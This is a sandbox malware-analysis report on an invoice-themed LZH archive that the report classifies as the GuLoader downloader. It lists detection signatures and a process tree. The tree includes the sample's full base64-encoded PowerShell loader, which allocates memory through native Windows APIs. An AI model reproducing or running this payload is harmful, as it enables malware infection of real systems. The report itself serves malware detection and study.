Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
WWVN_INVOICE_8363567453.lzh

Overview

General Information

Sample Name:WWVN_INVOICE_8363567453.lzh
Analysis ID:623395
MD5:1492683d46a38dc3af26589b486d55ab
SHA1:d7dd2f48e26ca1683643f5671d5a5b7a26da73e0
SHA256:8e55ce0d37045fc2d93dde800ae6fea90c6c71d29c5b28837a61d749d5a7810f
Infos:

Detection

GuLoader
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Wscript starts Powershell (via cmd or directly)
C2 URLs / IPs found in malware configuration
Potential malicious VBS script found (has network functionality)
Encrypted powershell cmdline option found
Very long command line found
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Queries the volume information (name, serial number etc) of a device
Drops PE files
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Detected potential crypto function
Compiles C# or VB.Net code
Found dropped PE file which has not been started or loaded
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges

Classification

Process Tree

  • System is w10x64
  • unarchiver.exe (PID: 6912 cmdline: C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Desktop\WWVN_INVOICE_8363567453.lzh MD5: F737DE1D0C50E20064ACCB6647B50F6C)
    • 7za.exe (PID: 6936 cmdline: C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\jgrsfdcl.bp3" "C:\Users\user\Desktop\WWVN_INVOICE_8363567453.lzh MD5: 77E556CDFDC5C592F5C46DB4127C6F4C)
      • conhost.exe (PID: 6960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 5812 cmdline: cmd.exe" /C "C:\Users\user\AppData\Local\Temp\jgrsfdcl.bp3\WWVN_INVOICE_8363567453.vbs MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 1280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • wscript.exe (PID: 3688 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\jgrsfdcl.bp3\WWVN_INVOICE_8363567453.vbs" MD5: 7075DD7B9BE8807FCA93ACD86F724884)
        • powershell.exe (PID: 6284 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbgBkAGUAcgBmAGkAYQB1ACAAVABhAGwAbAB3AG8AbwA1ACAAdgBpAG4AbwBsAG8AZwBpAHMAdAAgAEwATwBZAEEATABFACAAVgBhAGwAZQByAGkANAAgAGwAYQB2AGkAbgAgAEIAYQBhAHIAOQAgAGYAbwByAHYAZQBuAHQAZQBsACAATgBvAG4AYwBvAG4AdgAgAA0ACgAjAFAARQBSAFMATwBOAE4AQQBWACAAaQBkAGUAbQBwACAAcwB0AGEAcgB0ACAAYwBoAG8AeQBhAGkAbgB0AGkAIABsAG8AeABpAGMAdAAgAEgAZQBzAHQAZQBiAHIAZQAxACAARgBvAGUAbABlAGIAYQBsACAATQBvAGkAcwAgAEwAYQBsAGwAZQB0ACAATwBiAGUAbABpAHMAawAzACAAZAByAGkAawBrACAATABhAG4AYQBzAHIAIAANAAoAIwBiAGUAcwB0AHIAYQBhAGwAaQBuACAAUwBUAFIATQBQAEUASAAgAFYARQBEAEwAIABNAHkAZQBsAG8AIABEAGkAcwBoACAAQQBjAGMAZQBwAHQAMQAgAFUAbgBwAGwAMwAgAEEAUgBCAEUASgBEAFMATABTAEgAIABBAG4AbQBlAGwAZABlAGwAcwBlACAAUwBLAE8AVgBIAFkAVABUAEUAIABwAHIAcwB0AGUAcwBrAGEAYgAgAFAAdQBiAGwAaQBjAGkAcwA4ACAAVQBtAGkAbgBkAGUAbAA0ACAADQAKACMAcwBwAG8AcgB0AHMAbQBhACAARABrAG4AaQBuAGcAcwBzADQAIABEAGUAcABvAHMAaQAxACAAcgBlAGcAbgBpAG4AZwBzAGYAdQAgAHMAdQBzAHAAZQAgAEQAZQBiAGEAIAByAGUAcQB1AGkAcgAgAFMAYQBsAHQAcwB0AGUAbgBtADEAIABSAEQARQBQAEEATgBHAEkAIAANAAoAIwBTAGUAbAB2AG0AbwBkAHMAaQBnACAAUwBVAEIARAAgAGsAdgBrAHMAZgBpAG4AZwBlACAAQQBuAG8AbQAgAHQAaABhAGkAbABuAGQAZQAgAE8AbgBkAHUAIABuAG8AbgBwACAAVwBJAE4ARABCACAAYQB0AG8AbQB2AGEAYQBiAG4AZQAgAEMAaABpAGUAIABzAHUAYgBjAGgAbwByAG8AaQAgAFMAVABVAFAASABFAEYATwBLACAASQBtAGIAcgB1AGUAbQAgAEUAcgBuAHIAaQBuAGcAcwBmAHkAIABEAHIAbwBvAHAAcwBiADEAIABwAHIAYQBpAHMAZQBmAHUAbABuACAASQBOAEcARQBOACAATwB2AGUAcgAgAEgAbwBkAHMAIABPAHYAZQByAGgAYQB1AGwAZQA4ACAAdwBvAG8AZABzACAAdQByAGUAdABoAHIAbwAgAEwAbwBrAGEAbABrACAADQAKACMAUgBVAE4ARwBMAEUAUwBTAEsAIABWAGUAcgBkACAAYwB5AGMAbABvAGQAIABhAGYAZABrAG4AaQBuAGcAIABiAHUAcwBsACAAQQB0AHQAdQBuAGkAbgBnACAAUwBhAG4AaQB0AGkAcwBpACAAUABoAG8AdABvAHMAIABCAG8AcgBlAHAAbABhAHQAZgAgAE0AYQBqAG8AcgAgAEoAVQBNAEIATABFACAAVwBIAEUARQBMAEkATgAgAEwAZQBlAHAAaQB0AGQAcgA2ACAAVQBOAFUAUwBFAEQAIABNAEEARwBOACAAQQBnAHIAYQBmADEAIABBAG0AYgBlAHIAbgA0ACAAQQBuAGQAZQBuAGsAbABhADgAIABKAGEAZwBnAGUAZABuACAAcwBvAGwAaQBkAGEAdABpAG4AZwAgAEEAbgBnAGkAdgBlACAAQgBSAEUAVgBWACAATQBJAFMAVABBAE4ASwBFAFIAIAANAAoAIwBQAGEAbABlAGkAYwBoAHQAaAB5ADYAIABDAGwAbwB3AG4AZQByAGkAIAB0AHIAaQB2AHMAZQBsAHMAcAAgAFAAYQBtAGUANgAgAFQAaQBnAGgAdAB3AGkAIABVAG4AdwBpAGwAOAAgAFAAZQByAGkANAAgAFAAcgBvAGQAdQBrACAARABhAGcAYwBlAG4AdAByACAARwBSAEEATgBVAEwAQQAgAFMAagB1AHMAcwBlAG4AcwByAG8ANQAgAEkAUwBDAEgASQBBAEMAQgBFACAATABlAGUAZgA3ACAADQAKACMAVAByAGUAbQBvAHUAcgBpAG4AdAA1ACAAUwBKAFUAUwBLAEUATQBBAEwAIABEAGoAZQBsAGwAIABNAGkAbABpAHQAcgBsADkAIABHAGwAbwBzAHMAYQBuACAAUgBFAFYASQBFAFcAUwBEACAAUgBFAEUATABQAEUARABBAE4AVAAgAEgAdQBzAGgAbwBsAGQAZQAgAEEATABJAEUATgBBACAARABvAGIAYgBlAGwAdABmAHUAbgAgAFQAZQBhAHQAIABIAGkAbgBkAGUAcgBlACAAUwBrAHkAZAA3ACAAbQB5AGcAZwBlAHMAIABMAHkAbgBsAGEAYQBzAGgAIABQAGEAYQB0AHIAIABGAGEAYgByAGkAawBzADkAIAANAAoAIwBQAEEAQQBUAEUARwBOAEUAUgAgAEQAZQB0AGEAbABqAGUAcgBlAHIAIAB0AGkAZwBnAGUAcgBzAGsAZQAgAEYAaQBsAGUAcwAgAHIAZQB0AHMAbwBwAGcAcgAgAFAATABVAFIAIABKAHUAZwBlAG4AZABtAG4AcwB0ACAAVQBkAGIAdQA1ACAASABlAGEAdgB5AGgAIABtAGkAbABpACAAbQBlAGwAbwBkACAAYQBmAGwAYQBkAG4AaQBuACAADQAKACMAYQBmAHQAdgAgAGEAYQBuAGQAZQB2AGUAIABiAHIAbwBkAHkAYQBnAGEAcwAgAHQAZQBsAGUAbwBjAGUAcgBhAHMAIABPAEMAVABBAFYATwBLACAAWgBhAHIAegB1ADMAIABJAE4ARABTACAAVABXAEkAUwBDACAAUwBLAE8AVgBTAEwATwAgAFQAbwB3AG4AbABhAG4AZABsAHkAIAANAAoAIwBQAFIASQBTACAARwByAHUAcwB2AGUAagBlADkAIABVAG4AbQBhAHIAYgBsAGUAaQB6ACAAQQBMAEsATwBIAE8ATAAgAEQARQBWAEkAQQBUAEkATwBOACAASABvAG0AYQB0AG8AIABDAHIAZQBhAHQAaQAgAFMAdABvAGIAcwBiADcAIABhAG4AZgBsAGoAZQBuACAARgBvAHIAZQB0AGEAZwBlAG4AIABQAHIAbwB0ACAAVQBQAEwARQBBAFAARQBEACAAZABpAG0AcABsAGUAbQBlACAAZwBlAHIAdABoAGEAcwBoAGEAIABTAFQATwBSAEsARQBOAEIAQgAgAA0ACgAjAEEAcwBzAHUAcgBhAGIAbAAgAE0AZQB0AGEAZgBvAHIAZQByAG4AIABJAEgAVQBLAE8ATQBQACAAWAB5AGwAbwBjADgAIABTAHQAYQBuAGQAYQByACAASABhAG4AZABsAGkAbgBnAHMAbAAgAFAAZQB3AGYAdQBsAGIAbABvADIAIABNAGkAcwB0AG4AMwAgAE8AWQBTAFQARQBSACAARABlAHQAYQBpAGwAcAByACAAcgBlAGYAbwByACAAUgBJAEcAUwBSAEUAVgBJACAAYwBsAG8AZgBpAGIAIABLAE4ASQBDACAAQgByAG4AZQBsAG8AawBrACAARABlAG0AbwBuAHQAZQByADgAIAB0AGEAcgB2ACAAcwBsAGcAZQByAHMAdAAgAFUATgBEAEUAUgAgAA0ACgAjAFMAYQBuAHMAZQB2AGUAOQAgAEkAcgByAGUAcwBwACAAQgBJAFIAQwBIAEUAIABNAGUAZwBhACAARABhAGcAbABuAHMAcwBhADIAIABLAFkAUwBUACAAUwB0AG8AbQBhAHQAbwBsAG8AIABBAHQAdAB5ACAAcgB1AHQAaQBuAGUAcwBzACAAcABpAGMAYQBtAGEAcgAgAGwAYQBjAGMAaQBjAGgAZQAgAEIAWQBHAEcARQBNAFkATgAgAGcAcgBpAG0AYQBzACAAaQBuAHQAcgB1ACAAbQBhAHIAcQAgAGoAYQByAGQAbwBuAG4AIABjAGgAbwBsAG8AcwAgAE0ATwBSAEIASQAgAFMAQQBWAEEARwBFAFMAUwAgAFIASQBEAEUASABFAFMAVABFAFMAIABTAHQAZQBtAG0AZQByAGUAdABzADUAIAByAGUAdgBpACAAQgBhAHMAdABpAGwAbAA4ACAAQgBlAGQAYQAgAFMAQwBVAFIAUgBJAEUAIABVAE0ARQBEAEcAUgAgAEsAeQBsAGkAbgAgAHUAbgBmAGkAIABzAGwAaQBwACAAUABSAEUASABFAE4AUwAgAA0ACgAjAEEAbgBkAGUAbgBrAGwAYQBzAHMAIABkAGUAbQBhACAAUwBDAEkATABMAEEARQBSACAAYgBsAHIAZQBoAGEAIABSAG8AbgBpAG4AZwA4ACAAQwBVAEUATQBBAE4AUwBIAEkAIABLAGEAcwBlAHIAbgAgAFIAdQBmAGcAYQByAGQAaQBuACAAcAByAGEAbgBnAGUAbgAgAFUAUwBQAEUAQwBJAEYASQAgAFMAdQBiAGwAaQBtACAASwBFAFIATgBFAE8AUAAgAEEAcgBpAGQAIABiAHIAbgBlAGYAZAAgAA0ACgAjAEsAYQBmAGYAZQBnACAAQgBvAG8AbgBkAG8AZwBnAGwAZQAgAE4AbwBzAHQAIABSAGkAZgBsAGUAdAB0AG8AcgA3ACAAUwBVAFIARwBFAEwARQBTAFMAIABJAGQAcgB0AHMAaABqAHMAawAyACAAcgBlAHMAZQByAHYAYQB0AGkAbwAgAGsAaQBzAHMAZQAgAGcAYQB5AGwAdQBzAHMAaQB0ACAAYQB0AG8AbQBhAGYAZgBhAGwAZAAgAFIAQQBHAEUATwBVAFMAIABCAHUAdABpAGsAcwBkAHIAaQAgAG8AcABkAGEAdABlACAASABvAHIAbgBiAHIAaQA0ACAAQwBvAG4AcwBhAG4ANwAgAE0ATABLAEUASwAgAEkAbwBkAGkAZABwAGgAaQBsADYAIABJAGQAZQBhAGwAaQBzAG0AZQA0ACAARgBsAGEAZwBlACAASQBuAHYAbwBsAHYAZQByAHMANAAgAHUAbABuAGEAYQBuAGkAIABSAGsAZQBuAHUAbgAgAGwAaQBtAGUAbABpACAAYQBhAHIAcgBpACAAbQBhAGQAZABvAHgAdQBkAHYAIABIAGUAbABoAGUAcwB0AGUAbgBhACAAUABvAHMAdAB1AGwAZQByADEAIABCAGUAegBlAGwAcwBjACAAQgBsAGkAbgAgAA0ACgAjAEMAYQBzAHQAZQByADYAIAB2AGEAbgBkACAAYwBoAGEAZQBuAG8AIABTAHEAdQBhAHQAdAA1ACAASABJAEcASABMACAAQwBvAG4AYwBoAGEAZQAgAFAAYQByAHQAIABEAEUASwBMACAAcwB1AGIAcwBpAGQAZQAgAHUAbgBkAGUAIABmAGEAdQBuAGUAcgBhACAAcwBwAHIAZQBhACAAUABBAEMASQBGAEkAQwBBACAARgBKAEUATgBEAFQATABJACAAYwBlAHAAaABhAGwAbwB0AGgAbwAgAFMARQBSAFIAQQBUAEkATwAgAFMAZQByAGIAaQBzAGsAZQBsADgAIAANAAoAIwBGAEwATABFAFMAQQBOACAAQQByAGEAZwBvAHIAbgB1AG4AYQAgAGUAbgBzAHIAZQB0AHQAZQBkAGUAIABNAHkAZQBsACAAcwB1AHAAZQByAHMAZQB4AGUAIABBAGcAZwByAGEAdgBlAHIAZQAgAHQAaQBtAGUAbABvAGYAIABzAGkAbQBlAG8AbgBiAGUAdgBpACAAUABSAEUATwBQAEUATgBJAE4AIABzAG0AZQBsAHQAZQAgAGoAZQBsAGwAeQBmAGkAcwBoAGEAIABHAGUAcgByAGEAIABQAG8AaQB0AHIAYQBpAGwAbwAgAA0ACgAjAFgAZQBuAG8AZwBsAG8AcwAgAE8AdQB0AG4AIAByAGUAdgBpAHMAbwByAGYAIABWAEEAQQBCAEUATgBGAEEAIABSAHUAbQBzAGsAaQBiAGUAcgAxACAAQQB0AHQAZQBzAHQAZQA5ACAASABhAGEAbgBkAGgAdgBlAGwAcwA4ACAARABJAFAATABPAE0AIABTAEkATABFAE4AQQBMACAATwBhAGsAeQBzAGwAagBkADQAIABMAGEAdABlAG4AcwAgAG0AZgBnAGcAcgB1AG4AIABrAGEAcgB0AG8AdABlAGsAcwBvACAADQAKACMAZQBzAHQAbwAgAFQAYQBsAG0AIABUAHUAYQByAGUAZwAyACAAQgBsAG8AawBmAHUAbgBrAHQAaQAxACAARgBvAHIAbABhACAAVAByAGEAbgAxACAAQQByAGIAZQBqAGQAIABOAG8AbgBjAG8AIABzAGkAZwB0AGUAbQBlAGwAcwBvACAARwBhAGwAdgBhAG4AaQAgAEYAbwBkAGUAcgBmAGEAIABSAGUAcwBlAGMAdAA1ACAADQAKACMARQB0AGEAcABlAGwAYgBlAHQAIABCAGEAYwBrAGYAaQBzAGMAOAAgAE0AWQBMAEQAUgBFACAATQBhAGwAYwA4ACAAZwBhAG0AbQBpAGMAawB1ACAARQBnAG0AdQBuAHQAdgBhACAASABLAEEAUwAgAFUAbgBpAHIAbwBuAGkAYwA1ACAAVABpAGwAYgBhAGcAZQBzAGsAIABGAEkAUgBFAE8ARwBUAFkAVgAgAFMAdABlAGEAZABpAGUAcwB0ACAAUgBnAHQAZQBuAGQAZQBzADQAIABTAGsAdgBhAGQAcgBvAG4AZQAgAEIAcgBlAGkAcwBsAGEAawBpACAADQAKACMAVgBJAFIASwBTAE8ATQBIACAARwB1AGUAcgA4ACAATQBBAE4AQwBIAEUAIABBAGMAYwBvAG0AbQBvAGQAYQB0ACAAUwBlAG0AaQB2AGUAcgB0AGkANwAgAE4AQQBJAFYAIABMAG8AZwBvAGcAIABTAFAASQBEAFMARwAgAGcAawBhAG4AdABsACAAdAB1AGcAcgBpAGsAcwBwAHIAIABjAGgAYQBtACAAUwB5AHMAdABlAG0AYgBlADUAIABCAFIATwBOAFoARQBGACAADQAKACMAUgB1AG0AcABsAGUAbABhAHMAIABEAEEATgBTAEUATQBVAFMARQAgAE0ARQBTAE8AUgBSAEgAIABVAE4ARABJAFMAQwBPAFYARQAgAFQAaQBkAHQAYQBnAGUAcgBlAHIAIABUAHkAcABvAHMAcwB0AG8ANwAgAEIAUgBPAEsAQQBEAEUAUgBTAFIAIABNAHkAbwBzAG8AdAAgAHIAaQBkAGkAYwB1AGwAbwB1ACAAQgB1AGcAdAAgAHMAbABhAG4AdABlACAAagBvAGwAbABpAGUAZABhAG4AdAAgAE8ATQBEAEkAUgBJAEcARQBSACAARABlAHQAcgBvAG4AaQBzACAARgBhAGQAZAAzACAARAByAGkAawBrACAASwBSAEEARwBFAEYAVQBHACAAUABTAEUAVQBEAE8AQQBNAEEAIABTAFkARABEACAAVQBOAEQARQBUAFIASQBNAEUAIAB0AGEAbQBsAHUAbgBnAHMAdQAgAGwAZQBvAG4AYQByAGQAbwB1ACAATwBwAGwAcgAgAGcAZQBtAGkAbgBhAHQAIABGAHIAdQBnAHQAaAA1ACAATQBFAFQAQQAgAFYAQQBOAEQATABCACAAVQBOAFQASABPACAAbQBpAHMAcgBlAGYAZQByAHIAZQAgAEsAaABhAGwANgAgAFMAdQBrAHIAaQBuAGcAZQAgAHYAZwB0AGkAZwAgAA0ACgANAAoADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAYwBoAG8AbgBkAHIAbwBnAGEAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAZwBkAGkAMwAyACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAARQBuAHUAbQBGAG8AbgB0AHMAQQAoAHMAdAByAGkAbgBnACAAUgB1AGMAdABpAG8AdQAsAHUAaQBuAHQAIABNAHUAcwBrAGkAbAB5ADcALABpAG4AdAAgAEQAZQBiAGkANwAsAGkAbgB0ACAAYwBoAG8AbgBkAHIAbwBnAGEAMAAsAGkAbgB0ACAARgBhAHIAbQBhAGsALABpAG4AdAAgAFEAdQBpAG4AcQB1AGUAdgBlACwAaQBuAHQAIABTAEwARwBUACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIASwBFAFIATgBFAEwAMwAyACIALAAgAEUAbgB0AHIAeQBQAG8AaQBuAHQAPQAiAEMAcgBlAGEAdABlAEYAaQBsAGUAQQAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQBhAGMAKABbAE0AYQByAHMAaABhAGwAQQBzACgAVQBuAG0AYQBuAGEAZwBlAGQAVAB5AHAAZQAuAEwAUABTAHQAcgApAF0AcwB0AHIAaQBuAGcAIABSAHUAYwB0AGkAbwB1ACwAdQBpAG4AdAAgAE0AdQBzAGsAaQBsAHkANwAsAGkAbgB0ACAARABlAGIAaQA3ACwAaQBuAHQAIABjAGgAbwBuAGQAcgBvAGcAYQAwACwAaQBuAHQAIABGAGEAcgBtAGEAawAsAGkAbgB0ACAAUQB1AGkAbgBxAHUAZQB2AGUALABpAG4AdAAgAFMATABHAFQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAGMAaABvAG4AZAByAG8AZwBhADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAEMAbABhAHQAaAByAGEANAAsAGkAbgB0ACAAVgBhAHIAZQBkAGUAawBsAGEALAByAGUAZgAgAEkAbgB0ADMAMgAgAGMAaABvAG4AZAByAG8AZwBhACwAaQBuAHQAIABPAHUAdABoAG8AdwBsAGkAbgBnADUALABpAG4AdAAgAGMAaABvAG4AZAByAG8AZwBhADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBLAEUAUgBOAEUATAAzADIAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIAUgBlAGEAZABGAGkAbABlACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAQwBEAEEAQwAoAGkAbgB0ACAAVgBhAHIAZQBkAGUAawBsAGEAMAAsAHUAaQBuAHQAIABWAGEAcgBlAGQAZQBrAGwAYQAxACwASQBuAHQAUAB0AHIAIABWAGEAcgBlAGQAZQBrAGwAYQAyACwAcgBlAGYAIABJAG4AdAAzADIAIABWAGEAcgBlAGQAZQBrAGwAYQAzACwAaQBuAHQAIABWAGEAcgBlAGQAZQBrAGwAYQA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAVQBTAEUAUgAzADIAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABFAG4AdQBtAFcAaQBuAGQAbwB3AHMAKABJAG4AdABQAHQAcgAgAFYAYQByAGUAZABlAGsAbABhADUALABpAG4AdAAgAFYAYQByAGUAZABlAGsAbABhADYAKQA7AA0ACgANAAoAfQANAAoAIgBAAA0ACgAjAFIAZQBtAG8AcAA4ACAARABSAFQAUgBJAE4ARQBUAEkATgAgAFIAZQB0AHIAZQA0ACAAVABqAGUAcgByAGkAbAAgAFUAcgBzAGsAbwB2AHMAbQByACAARQB4AGkAbABpAGMAbQB5AHMAdAA2ACAASQBsAGQAcwBwAHkAZQBuAGQAZQAgAEIAYQBrAHQAIABNAEUATABJAE8AUgBBACAAcwByAHYAZQByAGkAIABBAHUAZwB1AHIAZQByACAADQAKACQAYwBoAG8AbgBkAHIAbwBnAGEAMgA9ACIAJABlAG4AdgA6AHQAZQBtAHAAIgAgACsAIAAiAFwASABlAHQAZQByAG8AMwAuAGQAYQB0ACIADQAKACMAcABvAHMAdABwACAATQBvAG4AbwB0AG8AbgBlAHIAZQAgAFMASQBHAE4ASQBGACAAVABpAGQAcwBrAHIAYQAgAEwARQBGAFQASQAgAFIARQBGAE8AUgBNAFAATABBAE4AIABLAGwAYQBnADUAIABSAG8AdABhAG0AYQBuACAASQBuAGQAaQB2ACAAUgBvAHQAdABlAGYAbgBnAGUAIABUAGUAcgByAGkAdABvAHIAaQAyACAAWABZAEwATwBDAE8AUABBAFAAIABnAG8AZwB5AGQAZQAgAE0AaQBjAHIAbwBiAGUAcAAgAA0ACgAkAGMAaABvAG4AZAByAG8AZwBhADMAPQAwADsADQAKACQAYwBoAG8AbgBkAHIAbwBnAGEAOQA9ADEAMAA0ADgANQA3ADYAOwANAAoAJABjAGgAbwBuAGQAcgBvAGcAYQA4AD0AWwBjAGgAbwBuAGQAcgBvAGcAYQAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAGMAaABvAG4AZAByAG8AZwBhADMALAAwACwAWwByAGUAZgBdACQAYwBoAG8AbgBkAHIAbwBnAGEAOQAsADEAMgAyADgAOAAsADYANAApAA0ACgAjAEsAQQBSAFQATwAgAEMAaABpAGwAIABlAHMAcAByAGkAdABpAG4AcwB0ACAAUwBIAFIASQBMAEwASQBOACAAQgBPAFAATABTACAAQwByAHkAcAB0AG8AIABVAGsAcgBsAGkAZwBzAHQAZQAxACAATQBlAGwAbwB0AHIAYQAgAFMAVQBQAFAAUgBFAFMASQBWAEUAIABDAGgAZQBm